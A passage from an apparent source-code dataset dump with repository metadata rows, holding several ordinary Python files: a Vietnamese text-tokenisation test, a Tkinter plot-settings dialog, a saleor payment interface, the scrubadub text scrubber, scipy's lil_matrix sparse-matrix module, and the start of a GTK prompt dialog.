self.assertEquals(uv.convert2Unsign(u'Giầy thể thao nữ'), u'Giay the thao nu')
self.assertEquals(uv.convert2Unsign(u'Thử xem ổn không nhé: Lưu Vĩnh Toàn, Phạm Kim Cương'), u'Thu xem on khong nhe: Luu Vinh Toan, Pham Kim Cuong')
def testTokenized(self):
s = u'Lưu Vĩnh+Toàn, Pham; Kim.Cuong A-B. A_B'
expect = [u'Lưu', u'Vĩnh', u'Toàn', u'Pham', u'Kim', u'Cuong', u'A', u'B', 'A_B']
self.assertEquals(uv.tokenized(s), expect)
def testMakePhraseToken(self):
self.assertEquals(uv.makePhraseToken(u'Lưu Vĩnh+Toàn, Pham; Kim.Cuong'), u'_lưu_vĩnh_toàn_pham_kim_cuong')
self.assertEquals(uv.makePhraseToken(u'Toàn'), u'_toàn')
self.assertEquals(uv.makePhraseToken(u';'), u'__')
self.assertEquals(uv.makePhraseToken(u''), u'_')
def testMakeSuffixNGramToken(self):
expect = set()
expect.add(u'_lưu_vĩnh_toàn_pham_kim_cuong')
expect.add(u'_luu_vinh_toan_pham_kim_cuong')
expect.add(u'_vĩnh_toàn_pham_kim_cuong')
expect.add(u'_vinh_toan_pham_kim_cuong')
expect.add(u'_toàn_pham_kim_cuong')
expect.add(u'_toan_pham_kim_cuong')
expect.add(u'_pham_kim_cuong')
expect.add(u'_kim_cuong')
expect.add(u'_cuong')
self.assertEquals(uv.makeSuffixNGramToken(u'Lưu Vĩnh+Toàn, Pham; Kim.Cuong'), expect)
def testMakeNGramToken(self):
expect = set()
expect.add(u'_lưu_vĩnh_toàn_pham')
expect.add(u'_vĩnh_toàn_pham_kim')
expect.add(u'_toàn_pham_kim_cuong')
expect.add(u'_lưu_vĩnh_toàn')
expect.add(u'_vĩnh_toàn_pham')
expect.add(u'_toàn_pham_kim')
expect.add(u'_pham_kim_cuong')
expect.add(u'_lưu_vĩnh')
expect.add(u'_vĩnh_toàn')
expect.add(u'_toàn_pham')
expect.add(u'_pham_kim')
expect.add(u'_kim_cuong')
expect.add(u'_lưu')
expect.add(u'_vĩnh')
expect.add(u'_toàn')
expect.add(u'_pham')
expect.add(u'_kim')
expect.add(u'_cuong')
self.assertEquals(uv.makeNGramToken(u'Lưu Vĩnh+Toàn, Pham; Kim.Cuong'), expect)
def testSimpleTokenized(self):
self.assertEquals(uv.simpleTokenized(u'hello \tw'), ['hello', 'w'])
self.assertEquals(uv.simpleTokenized(u't-mobile'), ['t','mobile'])
self.assertEquals(uv.simpleTokenized(u'o to, xe may'), ['o', 'to','xe', 'may'])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
abffbf28fffc2cff9a3165f8a00e57f2989d81b9 | 3b219f97d6ad54b8d061c3d7776dad064777ba0a | /matplotlayers/backends/tk/stack_settings.py | 0a2bb5ae0664a6f831bae21c7905a590ab68b033 | [
"MIT"
] | permissive | friedrichromstedt/matplotlayers | f03e94d99d6550e1657023889ad4defe7f1eb64f | a0c883476ac5b0f457e32e8831d87f7a0ca0bb80 | refs/heads/master | 2021-01-10T21:31:36.012401 | 2011-05-24T14:38:36 | 2011-05-24T14:38:36 | 1,793,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,303 | py | # Copyright (c) 2010 Friedrich Romstedt <[email protected]>
# See also <www.friedrichromstedt.org> (if e-mail has changed)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Developed since: Aug 2008
"""Defines the settings dialog class for accessing the details of a Stack."""
import Tkinter
import tkFileDialog
import ventry
class StackSettings(Tkinter.Toplevel):
def __init__(self, master,
stack,
callback_update):
"""STACK is the matplotlayers.Stack to act upon."""
Tkinter.Toplevel.__init__(self, master)
self.stack = stack
self.callback_update = callback_update
# Create Settings widgets ...
self.lframe_settings = Tkinter.LabelFrame(self, text = 'Settings')
self.lframe_settings.pack(side = Tkinter.LEFT, anchor = Tkinter.N)
# Create labeling widgets.
self.lframe_labeling = Tkinter.LabelFrame(self.lframe_settings,
text = 'Labeling')
self.lframe_labeling.pack(side = Tkinter.TOP, anchor = Tkinter.W)
self.frame_labeling = Tkinter.Frame(self.lframe_labeling)
self.frame_labeling.pack(side = Tkinter.TOP)
if self.stack.title is None:
initial_title = ''
else:
initial_title = self.stack.title.replace('\n',r'\n')
if self.stack.xlabel is None:
initial_xlabel = ''
else:
initial_xlabel = self.stack.xlabel.replace('\n',r'\n')
if self.stack.ylabel is None:
initial_ylabel = ''
else:
initial_ylabel = self.stack.ylabel.replace('\n',r'\n')
self.title = ventry.NamedVEntry(self.frame_labeling,
name = 'Title:',
column = 0, row = 0,
initial = initial_title,
width = 40)
self.xlabel = ventry.NamedVEntry(self.frame_labeling,
name = 'x label:',
column = 0, row = 1,
initial = initial_xlabel,
width = 40)
self.ylabel = ventry.NamedVEntry(self.frame_labeling,
name = 'y label:',
column = 0, row = 2,
initial = initial_ylabel,
width = 40)
self.title.initialise()
self.xlabel.initialise()
self.ylabel.initialise()
self.update_title()
self.button_update_labeling = Tkinter.Button(self.lframe_labeling,
text = 'Update Labeling',
command = self.tk_update_labeling)
self.button_update_labeling.pack(side = Tkinter.TOP,
fill = Tkinter.X)
# Create limit widgets.
self.lframe_limits = Tkinter.LabelFrame(self.lframe_settings,
text = 'Limits')
self.lframe_limits.pack(side = Tkinter.TOP, anchor = Tkinter.W)
self.frame_limits = Tkinter.Frame(self.lframe_limits)
self.frame_limits.pack(side = Tkinter.TOP)
(xlim0, xlim1) = self.stack.get_xlim()
(ylim0, ylim1) = self.stack.get_ylim()
self.xlim_left = ventry.NamedVEntry(self.frame_limits,
name = 'x Limits:',
column = 0, row = 0,
initial = xlim0,
validate = ventry.number)
self.xlim_right = ventry.VEntry(self.frame_limits,
initial = xlim1,
validate = ventry.number)
self.xlim_right.grid(column = 2, row = 0)
self.xlim_left.initialise()
self.xlim_right.initialise()
self.ylim_bottom = ventry.NamedVEntry(self.frame_limits,
name = 'y Limits:',
column = 0, row = 1,
initial = ylim0,
validate = ventry.number)
self.ylim_top = ventry.VEntry(self.frame_limits,
initial = ylim1,
validate = ventry.number)
self.ylim_top.grid(column = 2, row = 1)
self.ylim_bottom.initialise()
self.ylim_top.initialise()
self.autoscalex_on = Tkinter.BooleanVar(self.lframe_limits)
self.autoscaley_on = Tkinter.BooleanVar(self.lframe_limits)
self.autoscalex_on.set(self.stack.get_autoscalex_on())
self.autoscaley_on.set(self.stack.get_autoscaley_on())
self.checkbutton_autoscalex_on = Tkinter.Checkbutton(
self.lframe_limits,
text = 'x Autoscale',
command = self.tk_autoscalex_on,
variable = self.autoscalex_on)
self.checkbutton_autoscalex_on.pack(side = Tkinter.TOP)
self.checkbutton_autoscaley_on = Tkinter.Checkbutton(
self.lframe_limits,
text = 'y Autoscale',
command = self.tk_autoscaley_on,
variable = self.autoscaley_on)
self.checkbutton_autoscaley_on.pack(side = Tkinter.TOP)
self.button_update_limits = Tkinter.Button(self.lframe_limits,
text = 'Update Scales',
command = self.tk_update_limits)
self.button_update_limits.pack(side = Tkinter.TOP,
fill = Tkinter.X)
self.update_autoscalex_accessibility()
self.update_autoscaley_accessibility()
def tk_update_labeling(self):
self.stack.set_title(self.title.get().replace('\\n', '\n'))
self.stack.set_xlabel(self.xlabel.get().replace('\\n', '\n'))
self.stack.set_ylabel(self.ylabel.get().replace('\\n', '\n'))
self.callback_update()
self.update_title()
def tk_update_limits(self):
# Tells wheter an update is needed or not:
update_needed = False
if self.autoscalex_on.get():
# We are in autoscale mode, thus update the values displayed ...
(xlim0, xlim1) = self.stack.get_xlim()
self.xlim_left.set(xlim0)
self.xlim_right.set(xlim1)
else:
# We are in explicit mode, thus write the values typed in to
# the stack ...
self.stack.set_xlim(
(self.xlim_left.get(), self.xlim_right.get()))
# Only in this branch update the stack.
update_needed = True
if self.autoscaley_on.get():
# We are in autoscale mode, thus update the values displayed ...
(ylim0, ylim1) = self.stack.get_ylim()
self.ylim_bottom.set(ylim0)
self.ylim_top.set(ylim1)
else:
# We are in explicit mode thus write the values typed in to
# the stack ...
self.stack.set_ylim(
(self.ylim_bottom.get(), self.ylim_top.get()))
# Only in this branch update the stack.
update_needed = True
if update_needed:
self.callback_update()
def update_autoscalex_accessibility(self):
"""Enables / Disables widgets according to the X autoscale setting."""
if self.autoscalex_on.get():
# Disable the controls:
self.xlim_left.disable()
self.xlim_right.disable()
else:
# Enable the controls:
self.xlim_left.enable()
self.xlim_right.enable()
def update_autoscaley_accessibility(self):
"""Enables / Disables widgets according to the Y autoscale setting."""
if self.autoscaley_on.get():
# Disable the controls:
self.ylim_bottom.disable()
self.ylim_top.disable()
else:
# Enable the controls:
self.ylim_bottom.enable()
self.ylim_top.enable()
def tk_autoscalex_on(self):
"""Called on changes of the autoscale X checkbutton."""
# Update the stack's settings ...
if self.autoscalex_on.get():
self.stack.set_autoscale_on(x_on=True)
else:
self.stack.set_autoscale_on(x_on=False)
# Enable / disable the controls ...
self.update_autoscalex_accessibility()
# If the autoscaling has been disabled, update the limits
# because they may have changed due to autoscaling under the way ...
(xlim0, xlim1) = self.stack.get_xlim()
self.xlim_left.set(xlim0)
self.xlim_right.set(xlim1)
self.callback_update()
def tk_autoscaley_on(self):
"""Called on changes of the autoscale Y checkbutton."""
# Update the stack's settings ...
if self.autoscaley_on.get():
self.stack.set_autoscale_on(y_on=True)
else:
self.stack.set_autoscale_on(y_on=False)
# Enable / disable the controls ...
self.update_autoscaley_accessibility()
# If the autoscaling has been disabled, update the limits
# because they may have changed due to autoscaling under the way ...
(ylim0, ylim1) = self.stack.get_ylim()
self.ylim_bottom.set(ylim0)
self.ylim_top.set(ylim1)
self.callback_update()
def update_title(self):
"""Update the title of the window according to the title of the
stack."""
# Choose a title which is meaningful both if the title has been set
# and also if not.
self.wm_title('Stack Settings ' + self.title.get())
| [
"[email protected]"
] | |
47114303d4036a4aeb4733f34ef927d7095bb970 | ac2c3e8c278d0aac250d31fd023c645fa3984a1b | /saleor/saleor/core/payments.py | 777cdcf229f3af0436638628319a4ed5f6c33a12 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | permissive | jonndoe/saleor-test-shop | 152bc8bef615382a45ca5f4f86f3527398bd1ef9 | 1e83176684f418a96260c276f6a0d72adf7dcbe6 | refs/heads/master | 2023-01-21T16:54:36.372313 | 2020-12-02T10:19:13 | 2020-12-02T10:19:13 | 316,514,489 | 1 | 1 | BSD-3-Clause | 2020-11-27T23:29:20 | 2020-11-27T13:52:33 | TypeScript | UTF-8 | Python | false | false | 1,983 | py | from abc import ABC, abstractmethod
from typing import TYPE_CHECKING, List, Optional
if TYPE_CHECKING:
# flake8: noqa
from ..checkout.models import Checkout, CheckoutLine
from ..discount import DiscountInfo
from ..payment.interface import (
PaymentData,
GatewayResponse,
TokenConfig,
CustomerSource,
PaymentGateway,
)
class PaymentInterface(ABC):
@abstractmethod
def list_payment_gateways(
self, currency: Optional[str] = None, active_only: bool = True
) -> List["PaymentGateway"]:
pass
@abstractmethod
def checkout_available_payment_gateways(
self, checkout: "Checkout",
) -> List["PaymentGateway"]:
pass
@abstractmethod
def authorize_payment(
self, gateway: str, payment_information: "PaymentData"
) -> "GatewayResponse":
pass
@abstractmethod
def capture_payment(
self, gateway: str, payment_information: "PaymentData"
) -> "GatewayResponse":
pass
@abstractmethod
def refund_payment(
self, gateway: str, payment_information: "PaymentData"
) -> "GatewayResponse":
pass
@abstractmethod
def void_payment(
self, gateway: str, payment_information: "PaymentData"
) -> "GatewayResponse":
pass
@abstractmethod
def confirm_payment(
self, gateway: str, payment_information: "PaymentData"
) -> "GatewayResponse":
pass
@abstractmethod
def token_is_required_as_payment_input(self, gateway) -> bool:
pass
@abstractmethod
def process_payment(
self, gateway: str, payment_information: "PaymentData"
) -> "GatewayResponse":
pass
@abstractmethod
def get_client_token(self, gateway: str, token_config: "TokenConfig") -> str:
pass
@abstractmethod
def list_payment_sources(
self, gateway: str, customer_id: str
) -> List["CustomerSource"]:
pass
| [
"[email protected]"
] | |
09e35450b6520f6def9cc7c4b3196fd617f912dc | f7b3c098db4dcea347eac5ee18fc19b84cbf2059 | /scrubadub/scrubbers.py | fa06a388bb3e10f0b9bdd5a8bc93ad220ffe8f15 | [
"MIT"
] | permissive | jb08/scrubadub | f625a4bc265dfb743ab91f0a1449629392233cb2 | 7e7b6acc3938ded1e596960b6f095b7e79ae503e | refs/heads/master | 2021-01-16T22:03:02.271663 | 2016-01-14T20:25:32 | 2016-01-14T20:25:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,748 | py | import re
import operator
import textblob
import nltk
from . import exceptions
from . import detectors
from .filth import Filth, MergedFilth
class Scrubber(object):
"""The Scrubber class is used to clean personal information out of dirty
dirty text. It manages a set of ``Detector``'s that are each responsible
for identifying their particular kind of ``Filth``.
"""
def __init__(self, *args, **kwargs):
super(Scrubber, self).__init__(*args, **kwargs)
# instantiate all of the detectors
self.detectors = {}
for type, detector_cls in detectors.types.iteritems():
self.detectors[type] = detector_cls()
def clean(self, text, **kwargs):
"""This is the master method that cleans all of the filth out of the
dirty dirty ``text``. All keyword arguments to this function are passed
through to the ``Filth.replace_with`` method to fine-tune how the
``Filth`` is cleaned.
"""
if not isinstance(text, unicode):
raise exceptions.UnicodeRequired
clean_chunks = []
filth = Filth()
for next_filth in self.iter_filth(text):
clean_chunks.append(text[filth.end:next_filth.beg])
clean_chunks.append(next_filth.replace_with(**kwargs))
filth = next_filth
clean_chunks.append(text[filth.end:])
return u''.join(clean_chunks)
def iter_filth(self, text):
"""Iterate over the different types of filth that can exist.
"""
# currently doing this by aggregating all_filths and then sorting
# inline instead of with a Filth.__cmp__ method, which is apparently
# much slower http://stackoverflow.com/a/988728/564709
#
# NOTE: we could probably do this in a more efficient way by iterating
# over all detectors simultaneously. just trying to get something
# working right now and we can worry about efficiency later
all_filths = []
for detector in self.detectors.itervalues():
for filth in detector.iter_filth(text):
if not isinstance(filth, Filth):
raise TypeError('iter_filth must always yield Filth')
all_filths.append(filth)
all_filths.sort(key=operator.attrgetter("beg"))
# this is where the Scrubber does its hard work and merges any
# overlapping filths.
if not all_filths:
raise StopIteration
filth = all_filths[0]
for next_filth in all_filths[1:]:
if filth.end < next_filth.beg:
yield filth
filth = next_filth
else:
filth = filth.merge(next_filth)
yield filth
| [
"[email protected]"
] | |
a50ab7354bd04c8263af34a4f7c90352a755304e | d094ba0c8a9b1217fbf014aa79a283a49aabe88c | /env/lib/python3.6/site-packages/scipy/sparse/lil.py | c70f816d9a9118c4cec72b2b2917dca5086450f2 | [
"MIT",
"BSD-3-Clause-Open-MPI",
"BSD-3-Clause",
"GPL-3.0-or-later",
"Apache-2.0",
"Qhull",
"BSD-2-Clause",
"GCC-exception-3.1",
"Python-2.0",
"GPL-3.0-only",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Raniac/NEURO-LEARN | d9274e0baadd97bb02da54bdfcf6ca091fc1c703 | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | refs/heads/master | 2022-12-25T23:46:54.922237 | 2020-09-06T03:15:14 | 2020-09-06T03:15:14 | 182,013,100 | 9 | 2 | Apache-2.0 | 2022-12-09T21:01:00 | 2019-04-18T03:57:00 | CSS | UTF-8 | Python | false | false | 17,782 | py | """LInked List sparse matrix class
"""
from __future__ import division, print_function, absolute_import
__docformat__ = "restructuredtext en"
__all__ = ['lil_matrix','isspmatrix_lil']
from bisect import bisect_left
import numpy as np
from scipy._lib.six import xrange, zip
from .base import spmatrix, isspmatrix
from .sputils import (getdtype, isshape, isscalarlike, IndexMixin,
upcast_scalar, get_index_dtype, isintlike, check_shape,
check_reshape_kwargs)
from . import _csparsetools
class lil_matrix(spmatrix, IndexMixin):
"""Row-based linked list sparse matrix
This is a structure for constructing sparse matrices incrementally.
Note that inserting a single item can take linear time in the worst case;
to construct a matrix efficiently, make sure the items are pre-sorted by
index, per row.
This can be instantiated in several ways:
lil_matrix(D)
with a dense matrix or rank-2 ndarray D
lil_matrix(S)
with another sparse matrix S (equivalent to S.tolil())
lil_matrix((M, N), [dtype])
to construct an empty matrix with shape (M, N)
dtype is optional, defaulting to dtype='d'.
Attributes
----------
dtype : dtype
Data type of the matrix
shape : 2-tuple
Shape of the matrix
ndim : int
Number of dimensions (this is always 2)
nnz
Number of nonzero elements
data
LIL format data array of the matrix
rows
LIL format row index array of the matrix
Notes
-----
Sparse matrices can be used in arithmetic operations: they support
addition, subtraction, multiplication, division, and matrix power.
Advantages of the LIL format
- supports flexible slicing
- changes to the matrix sparsity structure are efficient
Disadvantages of the LIL format
- arithmetic operations LIL + LIL are slow (consider CSR or CSC)
- slow column slicing (consider CSC)
- slow matrix vector products (consider CSR or CSC)
Intended Usage
- LIL is a convenient format for constructing sparse matrices
- once a matrix has been constructed, convert to CSR or
CSC format for fast arithmetic and matrix vector operations
- consider using the COO format when constructing large matrices
Data Structure
- An array (``self.rows``) of rows, each of which is a sorted
list of column indices of non-zero elements.
- The corresponding nonzero values are stored in similar
fashion in ``self.data``.
"""
format = 'lil'
def __init__(self, arg1, shape=None, dtype=None, copy=False):
spmatrix.__init__(self)
self.dtype = getdtype(dtype, arg1, default=float)
# First get the shape
if isspmatrix(arg1):
if isspmatrix_lil(arg1) and copy:
A = arg1.copy()
else:
A = arg1.tolil()
if dtype is not None:
A = A.astype(dtype)
self._shape = check_shape(A.shape)
self.dtype = A.dtype
self.rows = A.rows
self.data = A.data
elif isinstance(arg1,tuple):
if isshape(arg1):
if shape is not None:
raise ValueError('invalid use of shape parameter')
M, N = arg1
self._shape = check_shape((M, N))
self.rows = np.empty((M,), dtype=object)
self.data = np.empty((M,), dtype=object)
for i in range(M):
self.rows[i] = []
self.data[i] = []
else:
raise TypeError('unrecognized lil_matrix constructor usage')
else:
# assume A is dense
try:
A = np.asmatrix(arg1)
except TypeError:
raise TypeError('unsupported matrix type')
else:
from .csr import csr_matrix
A = csr_matrix(A, dtype=dtype).tolil()
self._shape = check_shape(A.shape)
self.dtype = A.dtype
self.rows = A.rows
self.data = A.data
def __iadd__(self,other):
self[:,:] = self + other
return self
def __isub__(self,other):
self[:,:] = self - other
return self
def __imul__(self,other):
if isscalarlike(other):
self[:,:] = self * other
return self
else:
return NotImplemented
def __itruediv__(self,other):
if isscalarlike(other):
self[:,:] = self / other
return self
else:
return NotImplemented
# Whenever the dimensions change, empty lists should be created for each
# row
def getnnz(self, axis=None):
if axis is None:
return sum([len(rowvals) for rowvals in self.data])
if axis < 0:
axis += 2
if axis == 0:
out = np.zeros(self.shape[1], dtype=np.intp)
for row in self.rows:
out[row] += 1
return out
elif axis == 1:
return np.array([len(rowvals) for rowvals in self.data], dtype=np.intp)
else:
raise ValueError('axis out of bounds')
def count_nonzero(self):
return sum(np.count_nonzero(rowvals) for rowvals in self.data)
getnnz.__doc__ = spmatrix.getnnz.__doc__
count_nonzero.__doc__ = spmatrix.count_nonzero.__doc__
def __str__(self):
val = ''
for i, row in enumerate(self.rows):
for pos, j in enumerate(row):
val += " %s\t%s\n" % (str((i, j)), str(self.data[i][pos]))
return val[:-1]
def getrowview(self, i):
"""Returns a view of the 'i'th row (without copying).
"""
new = lil_matrix((1, self.shape[1]), dtype=self.dtype)
new.rows[0] = self.rows[i]
new.data[0] = self.data[i]
return new
def getrow(self, i):
"""Returns a copy of the 'i'th row.
"""
i = self._check_row_bounds(i)
new = lil_matrix((1, self.shape[1]), dtype=self.dtype)
new.rows[0] = self.rows[i][:]
new.data[0] = self.data[i][:]
return new
def _check_row_bounds(self, i):
if i < 0:
i += self.shape[0]
if i < 0 or i >= self.shape[0]:
raise IndexError('row index out of bounds')
return i
def _check_col_bounds(self, j):
if j < 0:
j += self.shape[1]
if j < 0 or j >= self.shape[1]:
raise IndexError('column index out of bounds')
return j
def __getitem__(self, index):
"""Return the element(s) index=(i, j), where j may be a slice.
This always returns a copy for consistency, since slices into
Python lists return copies.
"""
# Scalar fast path first
if isinstance(index, tuple) and len(index) == 2:
i, j = index
# Use isinstance checks for common index types; this is
# ~25-50% faster than isscalarlike. Other types are
# handled below.
if ((isinstance(i, int) or isinstance(i, np.integer)) and
(isinstance(j, int) or isinstance(j, np.integer))):
v = _csparsetools.lil_get1(self.shape[0], self.shape[1],
self.rows, self.data,
i, j)
return self.dtype.type(v)
# Utilities found in IndexMixin
i, j = self._unpack_index(index)
# Proper check for other scalar index types
i_intlike = isintlike(i)
j_intlike = isintlike(j)
if i_intlike and j_intlike:
v = _csparsetools.lil_get1(self.shape[0], self.shape[1],
self.rows, self.data,
i, j)
return self.dtype.type(v)
elif j_intlike or isinstance(j, slice):
# column slicing fast path
if j_intlike:
j = self._check_col_bounds(j)
j = slice(j, j+1)
if i_intlike:
i = self._check_row_bounds(i)
i = xrange(i, i+1)
i_shape = None
elif isinstance(i, slice):
i = xrange(*i.indices(self.shape[0]))
i_shape = None
else:
i = np.atleast_1d(i)
i_shape = i.shape
if i_shape is None or len(i_shape) == 1:
return self._get_row_ranges(i, j)
i, j = self._index_to_arrays(i, j)
if i.size == 0:
return lil_matrix(i.shape, dtype=self.dtype)
new = lil_matrix(i.shape, dtype=self.dtype)
i, j = _prepare_index_for_memoryview(i, j)
_csparsetools.lil_fancy_get(self.shape[0], self.shape[1],
self.rows, self.data,
new.rows, new.data,
i, j)
return new
def _get_row_ranges(self, rows, col_slice):
"""
Fast path for indexing in the case where column index is slice.
This gains performance improvement over brute force by more
efficient skipping of zeros, by accessing the elements
column-wise in order.
Parameters
----------
rows : sequence or xrange
Rows indexed. If xrange, must be within valid bounds.
col_slice : slice
Columns indexed
"""
j_start, j_stop, j_stride = col_slice.indices(self.shape[1])
col_range = xrange(j_start, j_stop, j_stride)
nj = len(col_range)
new = lil_matrix((len(rows), nj), dtype=self.dtype)
_csparsetools.lil_get_row_ranges(self.shape[0], self.shape[1],
self.rows, self.data,
new.rows, new.data,
rows,
j_start, j_stop, j_stride, nj)
return new
def __setitem__(self, index, x):
# Scalar fast path first
if isinstance(index, tuple) and len(index) == 2:
i, j = index
# Use isinstance checks for common index types; this is
# ~25-50% faster than isscalarlike. Scalar index
# assignment for other types is handled below together
# with fancy indexing.
if ((isinstance(i, int) or isinstance(i, np.integer)) and
(isinstance(j, int) or isinstance(j, np.integer))):
x = self.dtype.type(x)
if x.size > 1:
# Triggered if input was an ndarray
raise ValueError("Trying to assign a sequence to an item")
_csparsetools.lil_insert(self.shape[0], self.shape[1],
self.rows, self.data, i, j, x)
return
# General indexing
i, j = self._unpack_index(index)
# shortcut for common case of full matrix assign:
if (isspmatrix(x) and isinstance(i, slice) and i == slice(None) and
isinstance(j, slice) and j == slice(None)
and x.shape == self.shape):
x = lil_matrix(x, dtype=self.dtype)
self.rows = x.rows
self.data = x.data
return
i, j = self._index_to_arrays(i, j)
if isspmatrix(x):
x = x.toarray()
# Make x and i into the same shape
x = np.asarray(x, dtype=self.dtype)
x, _ = np.broadcast_arrays(x, i)
if x.shape != i.shape:
raise ValueError("shape mismatch in assignment")
# Set values
i, j, x = _prepare_index_for_memoryview(i, j, x)
_csparsetools.lil_fancy_set(self.shape[0], self.shape[1],
self.rows, self.data,
i, j, x)
def _mul_scalar(self, other):
if other == 0:
# Multiply by zero: return the zero matrix
new = lil_matrix(self.shape, dtype=self.dtype)
else:
res_dtype = upcast_scalar(self.dtype, other)
new = self.copy()
new = new.astype(res_dtype)
# Multiply this scalar by every element.
for j, rowvals in enumerate(new.data):
new.data[j] = [val*other for val in rowvals]
return new
def __truediv__(self, other): # self / other
if isscalarlike(other):
new = self.copy()
# Divide every element by this scalar
for j, rowvals in enumerate(new.data):
new.data[j] = [val/other for val in rowvals]
return new
else:
return self.tocsr() / other
def copy(self):
from copy import deepcopy
new = lil_matrix(self.shape, dtype=self.dtype)
new.data = deepcopy(self.data)
new.rows = deepcopy(self.rows)
return new
copy.__doc__ = spmatrix.copy.__doc__
def reshape(self, *args, **kwargs):
shape = check_shape(args, self.shape)
order, copy = check_reshape_kwargs(kwargs)
# Return early if reshape is not required
if shape == self.shape:
if copy:
return self.copy()
else:
return self
new = lil_matrix(shape, dtype=self.dtype)
if order == 'C':
ncols = self.shape[1]
for i, row in enumerate(self.rows):
for col, j in enumerate(row):
new_r, new_c = np.unravel_index(i * ncols + j, shape)
new[new_r, new_c] = self[i, j]
elif order == 'F':
nrows = self.shape[0]
for i, row in enumerate(self.rows):
for col, j in enumerate(row):
new_r, new_c = np.unravel_index(i + j * nrows, shape, order)
new[new_r, new_c] = self[i, j]
else:
raise ValueError("'order' must be 'C' or 'F'")
return new
reshape.__doc__ = spmatrix.reshape.__doc__
def resize(self, *shape):
shape = check_shape(shape)
new_M, new_N = shape
M, N = self.shape
if new_M < M:
self.rows = self.rows[:new_M]
self.data = self.data[:new_M]
elif new_M > M:
self.rows = np.resize(self.rows, new_M)
self.data = np.resize(self.data, new_M)
for i in range(M, new_M):
self.rows[i] = []
self.data[i] = []
if new_N < N:
for row, data in zip(self.rows, self.data):
trunc = bisect_left(row, new_N)
del row[trunc:]
del data[trunc:]
self._shape = shape
resize.__doc__ = spmatrix.resize.__doc__
def toarray(self, order=None, out=None):
d = self._process_toarray_args(order, out)
for i, row in enumerate(self.rows):
for pos, j in enumerate(row):
d[i, j] = self.data[i][pos]
return d
toarray.__doc__ = spmatrix.toarray.__doc__
def transpose(self, axes=None, copy=False):
return self.tocsr(copy=copy).transpose(axes=axes, copy=False).tolil(copy=False)
transpose.__doc__ = spmatrix.transpose.__doc__
def tolil(self, copy=False):
if copy:
return self.copy()
else:
return self
tolil.__doc__ = spmatrix.tolil.__doc__
def tocsr(self, copy=False):
lst = [len(x) for x in self.rows]
idx_dtype = get_index_dtype(maxval=max(self.shape[1], sum(lst)))
indptr = np.cumsum([0] + lst, dtype=idx_dtype)
indices = np.array([x for y in self.rows for x in y], dtype=idx_dtype)
data = np.array([x for y in self.data for x in y], dtype=self.dtype)
from .csr import csr_matrix
return csr_matrix((data, indices, indptr), shape=self.shape)
tocsr.__doc__ = spmatrix.tocsr.__doc__
def _prepare_index_for_memoryview(i, j, x=None):
"""
Convert index and data arrays to form suitable for passing to the
Cython fancy getset routines.
The conversions are necessary since to (i) ensure the integer
index arrays are in one of the accepted types, and (ii) to ensure
the arrays are writable so that Cython memoryview support doesn't
choke on them.
Parameters
----------
i, j
Index arrays
x : optional
Data arrays
Returns
-------
i, j, x
Re-formatted arrays (x is omitted, if input was None)
"""
if i.dtype > j.dtype:
j = j.astype(i.dtype)
elif i.dtype < j.dtype:
i = i.astype(j.dtype)
if not i.flags.writeable or i.dtype not in (np.int32, np.int64):
i = i.astype(np.intp)
if not j.flags.writeable or j.dtype not in (np.int32, np.int64):
j = j.astype(np.intp)
if x is not None:
if not x.flags.writeable:
x = x.copy()
return i, j, x
else:
return i, j
def isspmatrix_lil(x):
"""Is x of lil_matrix type?
Parameters
----------
x
object to check for being a lil matrix
Returns
-------
bool
True if x is a lil matrix, False otherwise
Examples
--------
>>> from scipy.sparse import lil_matrix, isspmatrix_lil
>>> isspmatrix_lil(lil_matrix([[5]]))
True
>>> from scipy.sparse import lil_matrix, csr_matrix, isspmatrix_lil
>>> isspmatrix_lil(csr_matrix([[5]]))
False
"""
return isinstance(x, lil_matrix)
| [
"[email protected]"
] | |
9e8d55b19f819bc5d3bd1235d4e62225b2271730 | b7b2f80ab5e1ee0ea028576e3014b62b8d3a8d7e | /pyedit/pyedit-032/pyedlib/pedync.py | 0ba8b937ecb2f51e498cc3516a5f9b0a422ebcc7 | [] | no_license | pglen/pgpygtk | 4d1405478a714f003984cf3e3db04ff1f767470b | 33f58010e304f1a312f2356de453ecedb7aa21ef | refs/heads/master | 2021-01-22T01:18:52.238415 | 2019-01-01T01:37:24 | 2019-01-01T01:37:24 | 102,215,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,693 | py | #!/usr/bin/env python
# Prompt Handler for pyedit
import os, string, gtk, gobject
import pyedlib.pedconfig
# ------------------------------------------------------------------------
def yes_no_cancel(title, message, cancel = True):
dialog = gtk.Dialog(title,
None,
gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT)
dialog.set_default_response(gtk.RESPONSE_YES)
dialog.set_position(gtk.WIN_POS_CENTER)
sp = " "
label = gtk.Label(message);
label2 = gtk.Label(sp); label3 = gtk.Label(sp)
hbox = gtk.HBox() ; hbox.pack_start(label2);
hbox.pack_start(label); hbox.pack_start(label3)
dialog.vbox.pack_start(hbox)
dialog.add_button("_Yes", gtk.RESPONSE_YES)
dialog.add_button("_No", gtk.RESPONSE_NO)
if cancel:
dialog.add_button("_Cancel", gtk.RESPONSE_CANCEL)
dialog.connect("key-press-event", area_key, cancel)
#dialog.connect("key-release-event", area_key, cancel)
dialog.show_all()
response = dialog.run()
# Convert all responses to cancel
